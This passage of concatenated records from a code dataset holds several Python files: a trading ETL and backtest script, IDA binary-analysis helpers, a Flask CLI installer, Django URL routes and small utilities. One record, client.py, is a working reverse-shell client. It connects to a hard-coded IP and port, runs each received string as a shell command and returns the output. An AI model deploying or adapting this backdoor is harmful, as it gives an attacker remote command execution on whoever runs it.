match[0])\n\n","sub_path":"limbo/plugins/tracer.py","file_name":"tracer.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"410841459","text":"import logging\nimport os\nimport sys\nimport time\nimport datetime as dt\nimport urllib.request as req\nimport urllib.parse as pars\nimport interface.bot as bot\nimport xml.etree.ElementTree as et\nfrom logging.handlers import TimedRotatingFileHandler\nfrom datetime import datetime, timedelta\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\n\n\nclass Operator:\n def __init__(self):\n # variable init\n self.bot_smwj = object()\n self.logger = object()\n self.db_session = object()\n self.logger = object()\n self.bind = str()\n self.today = time.strftime(\"%Y%m%d\")\n\n # sub classes init\n self.logger_start()\n self.chatbot_start()\n self.orm_init()\n\n # business day check\n if len(sys.argv) > 1 and sys.argv[1] == 'server':\n if self.bizday_check():\n # etl run\n if len(sys.argv) > 2 and sys.argv[2] is not None:\n self.etl_run(sys.argv[2])\n else:\n self.etl_run(self.today)\n else:\n self.shut_down()\n\n def chatbot_start(self):\n self.bot_smwj = bot.BotSmwj(self)\n self.bot_smwj.start()\n self.bot_smwj.send_message(\"smwj-fw is starting up\")\n\n def logger_start(self):\n logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)\n formatter = logging.Formatter('[%(levelname)s:%(lineno)s] %(asctime)s > %(message)s')\n self.logger = logging.getLogger()\n\n fh = TimedRotatingFileHandler(\"C:\\SMWJ_LOG\\\\analysis\", when=\"midnight\")\n fh.setFormatter(formatter)\n fh.suffix = \"_%Y%m%d.log\"\n\n ch = logging.StreamHandler(sys.stdout)\n ch.setFormatter(formatter)\n\n self.logger.addHandler(fh)\n self.logger.addHandler(ch)\n self.logger.setLevel(logging.INFO)\n\n def orm_init(self):\n scott = ic.dbconfig[\"user\"]\n tiger = ic.dbconfig[\"password\"]\n host = ic.dbconfig[\"host\"]\n self.bind = 'mysql+mysqlconnector://' + scott + ':' + tiger + '@' + host + ':3306/smwj'\n\n engine = create_engine(self.bind)\n dbsession = sessionmaker(autocommit=False, autoflush=False, bind=engine)\n self.db_session = dbsession()\n\n def fw_run(self, edate):\n # 0. 마스터 db 에 데이터 입력 : 향후 개발\n # 1. 마스터 db 에서 종가 확인 대상 종목 조회\n # 1) 신규 종목 추가됐을 경우 : 향후 개발\n # 2) 기존 종목 제외됐을 경우 : 향후 개발\n # 2. 종목들의 종가 확인\n # 3. forecast 계산\n # 4. position 계산\n # 5. 2~4 반복\n # 6. 종합 position 계산\n # * 계산한 포지션과 현재 포지션에 차이가 10% 이내일 경우 포지션 변동 없음\n # * 신규 종목 추가,제외시 포지션 리밸런싱 : 향후 개발\n # 7. 결과값 db 저장\n df_forecast = fc.forecast_ewmac()\n eb.login(self.logger)\n eb.retrieve_item_mst(self.logger, self.bind)\n\n #edate = self.today\n row_cnt = \"1\"\n\n d = datetime.today() - timedelta(days=10)\n sdate = d.strftime(\"%Y%m%d\")\n\n eb.retrieve_daily_chart(self.logger, self.bind, self.db_session, edate, edate)\n eb.retrieve_investor_volume(self.logger, self.bind, edate, edate)\n eb.retrieve_market_index_tr_amt(self.logger, self.bind, edate, edate)\n eb.retrieve_abroad_index(self.logger, self.bind, edate, row_cnt)\n eb.retrieve_market_liquidity(self.logger, self.bind, edate, sdate, row_cnt)\n\n self.shut_down()\n\n def bizday_check(self):\n url = 'http://apis.data.go.kr/B090041/openapi/service/SpcdeInfoService/getHoliDeInfo'\n query_params = '?' + pars.urlencode(\n {pars.quote_plus('serviceKey'): ic.publicdata['key'], pars.quote_plus('solYear'): self.today[:4],\n pars.quote_plus('solMonth'): self.today[4:6]})\n\n request = req.Request(url + query_params)\n request.get_method = lambda: 'GET'\n response_body = req.urlopen(request).read()\n\n root = et.fromstring(response_body)\n holidays = list()\n for locdate in root.iter('locdate'):\n holidays.append(locdate.text)\n\n self.logger.info(\"holiday list\")\n self.logger.info(holidays)\n\n bizday = True\n if dt.datetime.today().weekday() >= 5:\n bizday = False\n self.bot_smwj.send_message(\"today is weekend\")\n elif self.today in holidays:\n bizday = False\n self.bot_smwj.send_message(\"today is holiday\")\n elif self.today[4:8] == '0501':\n bizday = False\n self.bot_smwj.send_message(\"today is mayday\")\n\n return bizday\n\n def shut_down(self):\n self.bot_smwj.send_message(\"smwj-fw is shutting down\")\n\n os._exit(0)\n\n\nif __name__ == \"__main__\":\n op = Operator()\n\n import const.stat as ic\n import pandas as pd\n import numpy as np\n # import matplotlib.pyplot as plt\n import analysis.trend.anal_trend_common as com\n import analysis.trend.anal_trend_signal as sig\n import analysis.trend.anal_trend_position as pos\n\n pd.set_option('display.max_columns', None)\n pd.set_option('display.max_rows', None)\n\n '''가격 조회'''\n # prices = com.retrieve_pf_item_price('9', '20180101', '20190101')\n prices = com.retrieve_pf_item_price('10', '20110801', '20161231')\n # prices.groupby('item').describe()\n # prices.head(5)\n\n '''신호 및 변동성 계산'''\n # raw_signal, volatility = sig.signal_ewmac(prices, 16, 64)\n raw_signal_s, volatility_s = sig.signal_ewmac(prices, 4, 16)\n raw_signal_m, volatility_m = sig.signal_ewmac(prices, 16, 64)\n raw_signal_l, volatility_l = sig.signal_ewmac(prices, 64, 256)\n\n raw_signal = raw_signal_s.join(raw_signal_m, how='inner', rsuffix='_m')\n raw_signal = raw_signal.join(raw_signal_l, how='inner', rsuffix='_l')\n # raw_signal.head(5)\n # raw_signal.describe()\n # raw_signal.tail()\n\n test_df = raw_signal_s[['122630']]\n test_df = test_df.join(prices.groupby('item').apply(lambda x: x['close']).T[['122630']], how='inner', rsuffix='_prc')\n\n ax1 = test_df[['122630']].plot()\n\n ax2 = ax1.twinx()\n ax2.spines['right'].set_position(('axes', 1.0))\n test_df[['122630_prc']].plot(ax=ax2, color='Green')\n\n test_df.plot()\n # plt.legend(raw_signal_s.columns)\n # plt.subplot(211)\n # plt.plot(raw_signal_s)\n # plt.subplot(212)\n # plt.plot(prices.pivot(columns='item').pct_change())\n\n '''신호 스케일링'''\n scaled_signal = sig.signal_scaling(raw_signal, 25)\n # scaled_signal.abs().describe()\n # scaled_signal.tail()\n\n '''스케일링한 신호 비교'''\n # test_ewm_fast = raw_signal * 10 / raw_signal.abs().ewm(span=32).mean()\n # test_ewm_fast1 = raw_signal * 10 / raw_signal.abs().ewm(span=32, min_periods=32).mean()\n # test_ewm_slow = raw_signal * 10 / raw_signal.abs().ewm(span=64).mean()\n # test_mean = raw_signal * 10 / raw_signal.abs().rolling(window=64).mean()\n # test_static = raw_signal * 3.75\n\n # test_ewm_fast.abs().describe()\n # test_ewm_fast1.abs().describe()\n # test_ewm_slow.abs().describe()\n # test_mean.abs().describe()\n # test_static.abs().describe()\n\n # scaled_signal\n # plt.subplot(212)\n # plt.plot(scaled_signal)\n\n # scaled_signal.describe()\n # scaled_signal.tail()\n # volatility.describe()\n # volatility.tail()\n\n '''포지션 계산'''\n raw_pos = pos.position_sizing(scaled_signal, volatility, 10000000, 0.25)\n # raw_pos.describe()\n\n '''포지션 조정'''\n adj_pos = pos.position_stabilizing(raw_pos)\n\n # adj_pos.describe()\n # adj_pos.head(20)\n # raw_pos.head(20)\n\n adj_prc = prices.groupby('item').apply(lambda x: x['close']).T\n adj_prc = adj_prc[adj_pos.index[0]:]\n\n '''포지션 금액 확인'''\n returns, corr = com.dynamic_returns(adj_prc, adj_pos)\n\n # corr\n # adj_prc.describe()\n\n # adj_pos.head(20)\n # security_val.head(20)\n # cash_val.head(20)\n # account_val.head(20)\n # returns.head(20)\n # returns.sum()\n # np.mean(np.exp(returns) - 1)\n\n # need 'openpyxl' package\n with pd.ExcelWriter('v2_test_v1.1_20190424.xlsx') as writer:\n adj_prc.to_excel(writer, sheet_name='price')\n adj_pos.to_excel(writer, sheet_name='position')\n returns.to_excel(writer, sheet_name='returns')\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"143233000","text":"# Copyright (c) 2017 Trail of Bits, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom flow import *\nfrom table import *\n\n\ndef is_sane_reference_target(ea):\n \"\"\"Returns `True` if `target_ea` looks like the address of some code/data.\"\"\"\n if is_invalid_ea(ea):\n return False\n\n flags = idc.GetFlags(ea)\n if idaapi.isAlign(flags):\n return False\n\n if idc.isHead(flags):\n return True\n\n if has_string_type(ea):\n return True\n\n if idc.isTail(flags):\n head_ea = idc.PrevHead(ea)\n if has_string_type(head_ea):\n return True \n\n # TODO(pag): Check if it points at a logical element in an array, or at a\n # field of a struct.\n\n if idc.isCode(flags):\n return is_block_or_instruction_head(ea)\n\n if is_referenced(ea):\n return True\n\n # NOTE(pag): We test `idc.isCode` above; this check looks to see if the\n # segment itself is a code segment. This check happens after\n # `is_referenced`, because we may have something like a vtable\n # embedded in a code segment.\n if is_code(ea):\n return False\n\n\n item_size = idc.ItemSize(ea)\n\n DEBUG(\"!!! target_ea = {:x} item_size = {}\".format(ea, item_size))\n return 1 != item_size \n\ndef is_read_only_segment(ea):\n seg_ea = idc.SegStart(ea)\n seg = idaapi.getseg(seg_ea)\n\n if not seg:\n return False\n\n return (seg.perm & idaapi.SEGPERM_WRITE) == 0\n\n_NOT_STRING_TYPE_EAS = set()\n\n# TODO(pag): Why does the following get treated as a string with type `48326`?\n#\n# ; struct _EXCEPTION_POINTERS ExceptionInfo\n# ExceptionInfo _EXCEPTION_POINTERS \ndef has_string_type(ea):\n global _NOT_STRING_TYPE_EAS\n if ea in _NOT_STRING_TYPE_EAS:\n return False\n\n if not is_read_only_segment(ea):\n return False\n\n str_type = idc.GetStringType(ea)\n return (str_type is not None) and str_type != -1\n\ndef next_reasonable_head(ea, max_ea):\n \"\"\"Returns the next 'reasonable' head, skipping over alignments. One heuristic\n for matching strings is to see if there's an unmatched string between two\n matched ones. If the next logical head is a string, but the actual head is\n an alignment, then we really want to find the head of the string.\n\n TODO(pag): Investigate using `idc.NextNotTail(ea)`.\"\"\"\n while ea < max_ea:\n ea = idc.NextHead(ea, max_ea)\n flags = idc.GetFlags(ea)\n if not idaapi.isAlign(flags):\n return ea\n\n return idc.BADADDR\n\ndef find_missing_strings_in_segment(seg_ea, seg_end_ea):\n \"\"\"Try to find and mark missing strings in this segment.\"\"\"\n global _NOT_STRING_TYPE_EAS\n end_ea = idc.SegEnd(seg_ea)\n ea, next_ea = seg_ea, seg_ea\n last_was_string = False\n\n while next_ea < end_ea:\n next_head_ea = next_reasonable_head(next_ea, seg_end_ea)\n ea, next_ea = next_ea, next_head_ea\n item_size = idc.ItemSize(ea)\n if is_jump_table_entry(ea):\n DEBUG(\"Found jump table at {:x}, jumping to {:x}\".format(ea, next_ea))\n continue\n\n next_is_string = has_string_type(next_head_ea)\n\n as_str = idc.GetString(ea, -1, -1)\n if has_string_type(ea):\n if as_str is not None and len(as_str):\n next_ea = ea + item_size\n last_was_string = True\n DEBUG(\"Found string {} of length {} at {:x}, jumping to {:x}\".format(\n repr(as_str), item_size, ea, next_ea))\n make_head(ea)\n continue\n else:\n _NOT_STRING_TYPE_EAS.add(ea)\n\n # If we find a zero, then assume it's possibly padding between strings, and\n # so don't change the state of `last_was_string`.\n if 0 == read_byte(ea):\n next_ea = ea + 1\n continue\n\n if as_str is None or not len(as_str):\n last_was_string = False\n continue\n\n # A bit aggressive, but lets try to make it into a string.\n if last_was_string and 1 < len(as_str):\n old_item_size = idc.ItemSize(ea) \n if 1 != idc.MakeStr(ea, idc.BADADDR):\n last_was_string = False\n continue\n\n item_size = idc.ItemSize(ea)\n next_ea = ea + item_size\n last_was_string = True\n\n if 1 != old_item_size or not is_referenced(ea):\n DEBUG(\"WARNING: Made {:x} into a string of length {}\".format(ea, item_size))\n continue\n\n # Clear the `last_was_string` flag\n last_was_string = False\n\n # # Look for one string squashed between another. Compilers tend to place\n # # all strings together, and sometimes IDA misses some of the intermediate\n # # ones when they aren't directly referenced.\n # if last_was_string and next_is_string:\n # max_str_len = (next_head_ea - ea)\n # if 1 != idc.MakeStr(ea, idc.BADADDR):\n # last_was_string = False\n # continue\n\n # item_size = idc.ItemSize(ea)\n # DEBUG(\"Inferred string {} of length {} at {:x} to {:x}\".format(\n # repr(as_str), item_size, ea, next_head_ea))\n # make_head(ea)\n # next_ea = ea + item_size\n # last_was_string = True\n\ndef remaining_item_size(ea):\n flags = idc.GetFlags(ea)\n size = idc.ItemSize(ea)\n if idc.isHead(flags):\n return size\n\n head_ea = idc.PrevHead(ea, max(0, ea - size))\n if is_invalid_ea(head_ea):\n return 0\n assert (head_ea + size) >= ea\n return (head_ea + size) - ea\n\ndef find_missing_xrefs_in_segment(seg_ea, seg_end_ea, binary_is_pie):\n \"\"\"Look for cross-refernces that were missed by IDA. This function assumes\n a natural alignments for pointers (i.e. 4- or 8-byte alignment).\"\"\"\n\n seg_ea = (seg_ea + 3) & ~3 # Align to a 4-byte boundary.\n\n try_qwords = get_address_size_in_bits() == 64\n try_dwords = True\n if try_qwords and binary_is_pie:\n try_dwords = False\n\n pointer_size = try_qwords and 8 or 4\n ea, next_ea = idc.BADADDR, seg_ea\n\n missing_refs = []\n\n while next_ea < seg_end_ea:\n ea, next_ea = next_ea, idc.BADADDR\n if is_invalid_ea(ea):\n break\n\n flags = idc.GetFlags(ea)\n\n # Jump over strings.\n if has_string_type(ea):\n item_size = max(1, remaining_item_size(ea)) # Guarantee forward progress.\n next_ea = ea + item_size\n DEBUG(\"Found string at {:x}, jumping to {:x}\".format(ea, next_ea))\n continue\n\n if (ea % 4) != 0:\n next_ea = (ea + 3) & ~3\n DEBUG(\"Aligning from {:x} to {:x}\".format(ea, next_ea))\n assert ea < next_ea\n continue\n\n fixup_ea = idc.GetFixupTgtOff(ea)\n if binary_is_pie and not is_sane_reference_target(fixup_ea):\n continue\n\n qword_data, dword_data = 0, 0\n\n # Try to read it as an 8-byte pointer.\n if try_qwords and (ea + 8) <= seg_end_ea:\n target_ea = qword_data = read_qword(ea)\n if is_sane_reference_target(target_ea):\n DEBUG(\"Adding qword reference from {:x} to {:x}\".format(ea, target_ea))\n make_xref(ea, target_ea, idc.MakeQword, 8)\n next_ea = ea + 8\n continue\n\n # Try to read it as a 4-byte pointer.\n if try_dwords and (ea + 4) <= seg_end_ea:\n target_ea = dword_data = read_dword(ea)\n if is_sane_reference_target(target_ea):\n DEBUG(\"Adding dword reference from {:x} to {:x}\".format(ea, target_ea))\n make_xref(ea, target_ea, idc.MakeDword, 4)\n next_ea = ea + 4\n continue\n\n # We've got a reference from here; it might actually be that we're inside\n # of a larger thing (e.g. an array, or struct) and so this reference target\n # doesn't belong to `ea`, but really a nearby `ea`. Let's go and remove it.\n target_ea = get_reference_target(ea)\n if not is_invalid_ea(target_ea) and 0 != (qword_data | dword_data):\n DEBUG(\"WARNING: Removing likely in-object reference from nearby {:x} to {:x}\".format(\n ea, target_ea))\n idaapi.do_unknown_range(ea, 4, idc.DOUNK_EXPAND)\n\n next_ea = ea + 4\n\n DEBUG(\"Stopping scan at {:x}\".format(ea))\n\ndef _next_code_or_jt_ea(ea):\n \"\"\"Scan forward looking for the next non-data effective address.\"\"\"\n seg_end_ea = idc.SegEnd(ea)\n while ea <= seg_end_ea:\n flags = idc.GetFlags(ea)\n if idc.isCode(flags):\n break\n if is_jump_table_entry(ea):\n break\n ea += 1\n return ea\n\ndef find_missing_xrefs_in_code_segment(seg_ea, seg_end_ea, binary_is_pie):\n \"\"\"Looks for data cross-references in a code segment.\"\"\"\n ea, next_ea = seg_ea, seg_ea\n while next_ea < seg_end_ea:\n ea = next_ea\n\n if is_jump_table_entry(ea):\n next_ea = ea + 1\n continue\n\n # This manifests in AArch64 as something like:\n #\n # .text:00400488 LDR X0, =main\n # .text:0040048C LDR X3, =__libc_csu_init\n # .text:00400490 LDR X4, =__libc_csu_fini\n # .text:00400494 BL .__libc_start_main\n # .text:00400498 BL .abort\n # .text:00400498 ; End of function _start\n # .text:00400498\n # .text:00400498 ; ----------------------------------------------------\n # .text:0040049C ALIGN 0x20\n # .text:004004A0 off_4004A0 DCQ main \n # .text:004004A8 off_4004A8 DCQ __libc_csu_init\n # .text:004004B0 off_4004B0 DCQ __libc_csu_fini\n #\n # Where the `LDR` references a nearby slot in the `.text` segment wherein\n # there is a reference to the real function.\n #\n # In x86, we see this behavior with embedded exception tables. This comes\n # up a bunch in Windows binaries.\n flags = idc.GetFlags(ea)\n if idc.isData(flags):\n next_ea = _next_code_or_jt_ea(ea + 1)\n find_missing_xrefs_in_segment(ea, next_ea, binary_is_pie)\n continue\n\n else:\n next_ea = idc.NextHead(ea)\n continue\n\n DEBUG_POP()\n\ndef decode_segment_instructions(seg_ea, binary_is_pie):\n \"\"\"Tries to find all jump tables ahead of time. A side-effect of this is to\n create a decoded instruction and jump table cache. The other side-effect is\n that the decoding of jump tables will *remove* some cross-references.\"\"\"\n seg_end_ea = idc.SegEnd(seg_ea)\n for head_ea in idautils.Heads(seg_ea, seg_end_ea):\n inst, _ = decode_instruction(head_ea)\n get_instruction_references(inst, binary_is_pie)\n table = get_jump_table(inst, binary_is_pie)\n\n for funcea in idautils.Functions(seg_ea, seg_end_ea):\n find_default_block_heads(funcea)\n\ndef process_segments(binary_is_pie):\n \"\"\"Pre-process a segment and try to fill in as many cross-references\n as is possible.\"\"\"\n\n seg_eas = [ea for ea in idautils.Segments() if not is_invalid_ea(ea)]\n\n # Go through through the data segments and look for strings, and through the\n # code segments and look for instructions. One result is that we should find\n # and identify jump tables, which we need to do so that we don't incorrectly\n # categorize some things as strings.\n for seg_ea in seg_eas:\n seg_name = idc.SegName(seg_ea)\n seg_end_ea = idc.SegEnd(seg_ea)\n if is_code(seg_ea):\n DEBUG(\"Looking for instructions in segment {}\".format(seg_name))\n DEBUG_PUSH()\n decode_segment_instructions(seg_ea, binary_is_pie)\n DEBUG_POP()\n else:\n DEBUG(\"Looking for strings in segment {} [{:x}, {:x})\".format(\n seg_name, seg_ea, seg_end_ea))\n DEBUG_PUSH()\n find_missing_strings_in_segment(seg_ea, seg_end_ea)\n DEBUG_POP()\n\n # Now go through through the data segments and find missing cross-references.\n for seg_ea in seg_eas:\n seg_name = idc.SegName(seg_ea)\n seg_end_ea = idc.SegEnd(seg_ea)\n DEBUG(\"Looking for cross-references in segment {} [{:x}, {:x})\".format(\n seg_name, seg_ea, seg_end_ea))\n\n DEBUG_PUSH()\n if is_code(seg_ea):\n find_missing_xrefs_in_code_segment(seg_ea, seg_end_ea, binary_is_pie)\n else:\n find_missing_xrefs_in_segment(seg_ea, seg_end_ea, binary_is_pie)\n DEBUG_POP()\n\n # Okay, hopefully by this point we've been able to introduce more information\n # so that IDA can better find references. We'll enable caching of instruction\n # references from now on so that we don't need to repeat too much work.\n enable_reference_caching()\n","sub_path":"tools/mcsema_disass/ida/segment.py","file_name":"segment.py","file_ext":"py","file_size_in_byte":12419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"99402756","text":"import platform\nimport os\nimport click\nimport csv\nfrom shutil import copyfile\nfrom config import basedir\nfrom app.core.models import CoreModel, CoreModule\nfrom app import MODULES\nfrom app import db\nfrom . import bp_core\nfrom .models import CoreCity,CoreProvince\nfrom app.auth.models import User, Role\n\n\n\ndef core_install():\n \"\"\"\n Tatanggap to ng list ng modules tapos iinsert nya sa database yung mga models o tables nila, \\\n para malaman ng system kung ano yung mga models(eg. Users,Customers)\n Parameters\n ----------\n modules\n Listahan ng mga modules na iinstall sa system\n \"\"\"\n\n print(\"Installing...\")\n\n try:\n\n if platform.system() == \"Windows\":\n provinces_path = basedir + \"\\\\app\" + \"\\\\core\" + \"\\\\csv\" + \"\\\\provinces.csv\"\n cities_path = basedir + \"\\\\app\" + \"\\\\core\" + \"\\\\csv\" + \"\\\\cities.csv\"\n elif platform.system() == \"Linux\":\n provinces_path = basedir + \"/app/core/csv/provinces.csv\"\n cities_path = basedir + \"/app/core/csv/cities.csv\"\n else:\n raise Exception(\"Platform not supported yet.\")\n \n module_count = 0\n\n homebest_module = None\n\n for module in MODULES:\n # TODO: Iimprove to kasi kapag nag error ang isa damay lahat dahil sa last_id\n homebest_module = CoreModule.objects(name=module.module_name).first()\n # last_id = 0\n if not homebest_module:\n new_module = CoreModule(\n name=module.module_name,\n short_description=module.module_short_description,\n long_description=module.module_long_description,\n status='installed',\n version=module.version\n ).save()\n\n homebest_module = new_module\n \n print(\"MODULE - {}: SUCCESS\".format(new_module.name))\n # last_id = new_module.id\n\n model_count = 0\n\n for model in module.models:\n homebestmodel = CoreModel.objects(name=model.__amname__).first()\n\n if not homebestmodel:\n new_model = CoreModel(\n name=model.__amname__,\n module=homebest_module,\n description=model.__amdescription__,\n ).save()\n\n print(\"MODEL - {}: SUCCESS\".format(new_model.name))\n\n model_count = model_count + 1\n\n if len(module.no_admin_models) > 0 :\n\n for xmodel in module.no_admin_models:\n homebestmodel = CoreModel.objects(name=xmodel.__amname__).first()\n \n if not homebestmodel:\n new_model = CoreModel(\n name=xmodel.__amname__, \n module=homebest_module,\n description=xmodel.__amdescription__,\n admin_included=False\n ).save()\n\n print(\"MODEL - {}: SUCCESS\".format(new_model.name))\n\n module_count = module_count + 1\n\n print(\"Inserting provinces to database...\")\n if CoreProvince.objects.count() < 88:\n with open(provinces_path) as f:\n csv_file = csv.reader(f)\n\n for id, row in enumerate(csv_file):\n if not id == 0:\n CoreProvince(\n name=row[2]\n ).save()\n\n print(\"Provinces done!\")\n\n else:\n print(\"Provinces exists!\")\n print(\"\")\n print(\"Inserting cities to database...\")\n \n if CoreCity.objects.count() < 1647:\n with open(cities_path) as f:\n csv_file = csv.reader(f)\n\n for id,row in enumerate(csv_file):\n if not id == 0:\n \n CoreCity(\n name=row[2]\n ).save()\n\n print(\"Cities done!\")\n else:\n print(\"Cities exists!\")\n\n print(\"Inserting system roles...\")\n if Role.objects.count() > 0:\n print(\"Role already inserted!\")\n else:\n Role(\n name=\"Admin\",\n ).save()\n \n print(\"Admin role inserted!\")\n\n if not User.objects.count() > 0:\n print(\"Creating a SuperUser/owner...\")\n _create_superuser()\n\n except Exception as exc:\n print(str(exc))\n return False\n\n return True\n\n\n@bp_core.cli.command('create_superuser')\ndef create_superuser():\n _create_superuser()\n\n\n@bp_core.cli.command(\"create_module\")\n@click.argument(\"module_name\")\ndef create_module(module_name):\n try:\n\n if platform.system() == \"Windows\":\n module_path = basedir + \"\\\\app\" + \"\\\\\" + module_name\n templates_path = basedir + \"\\\\app\" + \"\\\\\" + module_name + \"\\\\\" + \"templates\" + \"\\\\\" + module_name \n core_init_path = basedir + \"\\\\app\" + \"\\\\core\" + \\\n \"\\\\module_template\" + \"\\\\__init__.py\"\n core_models_path = basedir + \"\\\\app\" + \\\n \"\\\\core\" + \"\\\\module_template\" + \"\\\\models.py\"\n core_routes_path = basedir + \"\\\\app\" + \\\n \"\\\\core\" + \"\\\\module_template\" + \"\\\\routes.py\"\n elif platform.system() == \"Linux\":\n module_path = basedir + \"/app\" + \"/\" + module_name\n templates_path = basedir + \"/app\" + \"/\" + module_name + \"/templates\" + \"/\" + module_name\n core_init_path = basedir + \"/app\" + \"/core\" + \"/module_template\" + \"/__init__.py\"\n core_models_path = basedir + \"/app\" + \"/core\" + \"/module_template\" + \"/models.py\"\n core_routes_path = basedir + \"/app\" + \"/core\" + \"/module_template\" + \"/routes.py\"\n else:\n raise Exception\n \n core_file_list = [core_init_path, core_models_path, core_routes_path]\n\n if not os.path.exists(module_path):\n os.mkdir(module_path)\n os.makedirs(templates_path)\n for file_path in core_file_list:\n file_name = os.path.basename(file_path)\n copyfile(file_path, os.path.join(module_path, file_name))\n except OSError as e:\n print(\"Creation of the directory failed\")\n print(e)\n else:\n print(\"Successfully created the directory %s \" % module_path)\n\n\n@bp_core.cli.command(\"install\")\ndef install():\n\n if core_install():\n print(\"Installation complete!\")\n\n else:\n print(\"Installation failed!\")\n\n\ndef _create_superuser():\n try:\n role = Role.objects(name=\"Admin\").first()\n\n user = User(\n fname=\"Administrator\",\n lname=\"Administrator\",\n username = input(\"Enter Username: \"),\n email = None,\n is_superuser = 1,\n role=role,\n created_by = \"System\",\n )\n user.set_password(input(\"Enter password: \"))\n user.save()\n print(\"SuperUser Created!\")\n except Exception as exc:\n print(str(exc))\n","sub_path":"app/core/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":7173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"434571124","text":"import os\r\nimport socket\r\nimport subprocess\r\n\r\n\r\ns = socket.socket()\r\nhost = '192.168.10.155' # Server ip\r\nport = 9999\r\n\r\ns.connect((host,port))\r\n\r\n\r\nwhile True:\r\n\tdata = s.recv(1024)\r\n\tif data[:2].decode(\"utf-8\") == \"cd\": # if first 2 chars of command = cd as it does not return anything\r\n\t\tos.chdir(data[3:].decode(\"utf-8\"))\r\n\r\n\tif len(data) > 0:\r\n\t\tcmd = subprocess.Popen(data[:].decode(\"utf-8\"), shell= True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) # Run Command in the terminal\r\n\t\t# only : no number means whole command \r\n\t\toutput_bytes = cmd.stdout.read() + cmd.stderr.read()\r\n\t\toutput_str = str(output_bytes, \"utf-8\")\r\n\t\t# prints out the prompt\r\n\t\ts.send(str.encode(output_str + str(os.getcwd()) + \"> \"))\r\n\t\tprint(output_str) # Results on the clients machine\r\n\r\n# Close Connection\r\ns.close()\r\n\r\n\r\n","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"518246454","text":"from django.urls import include, path\nfrom hb_app import views\n\nurlpatterns = [\n #views.index because we called the function index\n path('', views.index, name='index'),\n path('png',views.png, name='png'),\n #happy budget stuff\n path('accounts',views.accounts, name='accounts'),\n path('finances',views.finances, name='finances'),\n path('newTransaction', views.addTransaction),\n path('home',views.home, name='home'),\n path('login',views.login, name='login'),\n\n path('signUp', views.signUp, name = 'signUp'),\n path('processSignUp', views.processSignUp, name = 'processSignUp'),\n path('processLogin', views.processLogin, name = 'processLogin'),\n path('processLogOut', views.processLogOut, name = 'processLogOut'),\n\n path('personalGoals',views.personalGoals, name='personalGoals'),\n path('interactivePet',views.interactivePet, name='interactivePet'),\n path('feed/', views.feedGoal, name='feed'),\n path('interactivePet_eating',views.interactivePet_eating, name='interactivePet_eating'),\n #random file to test db connections\n path('dummy',views.dummy, name='dummy'),\n path('new', views.newGoal),\n path('delete/', views.deleteGoal, name='delete'),\n path('invest/', views.investInGoal, name='invest'),\n path('pie-chart/', views.pie_chart, name='pie-chart'),\n]\n","sub_path":"Application/HappyBudget/hb_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"322575293","text":"from pathlib import Path\n\ndef files_in_folder(file_extension):\n# Returns current directory\n p = Path('.')\n# Read in list of files in current directory that have file type file_extension\n a = list(p.glob('*' + file_extension))\n return (a)\n\ndef strip_extension(file_list,file_extension):\n file_list = [ str(x).strip(file_extension) for x in file_list]\n return file_list\n\n\nfile_type = '.txt'\nunstripped_list = files_in_folder(file_type)\nstripped_list = strip_extension(unstripped_list,file_type)\nprint(stripped_list)","sub_path":"src/FileFinder.py","file_name":"FileFinder.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"469701744","text":"#!/usr/bin/env python3\n\n# MIT License\n# \n# Copyright (c) 2021, Alex M. Maldonado\n# \n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n# \n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\nimport os\nimport json\nimport numpy as np\nfrom qa_tools.utils import calc_spin\n\ndata_dir = '../../qa-atoms-data/data'\n\nonly_filename = True # Instead of printing the absolute path, we print just the filename.\nspin_deviation = 0.2 # Minimum spin deviation to consider \"contaminated\".\n\n# Lambda selection. Allows you to only check certain lambdas for convergence.\n# Note that both options can be True at the same time.\nonly_fin_diff_lambdas = True # Only check calculations for lambdas used in finite differences.\nonly_int_lambdas = True # Only check calculations for integer 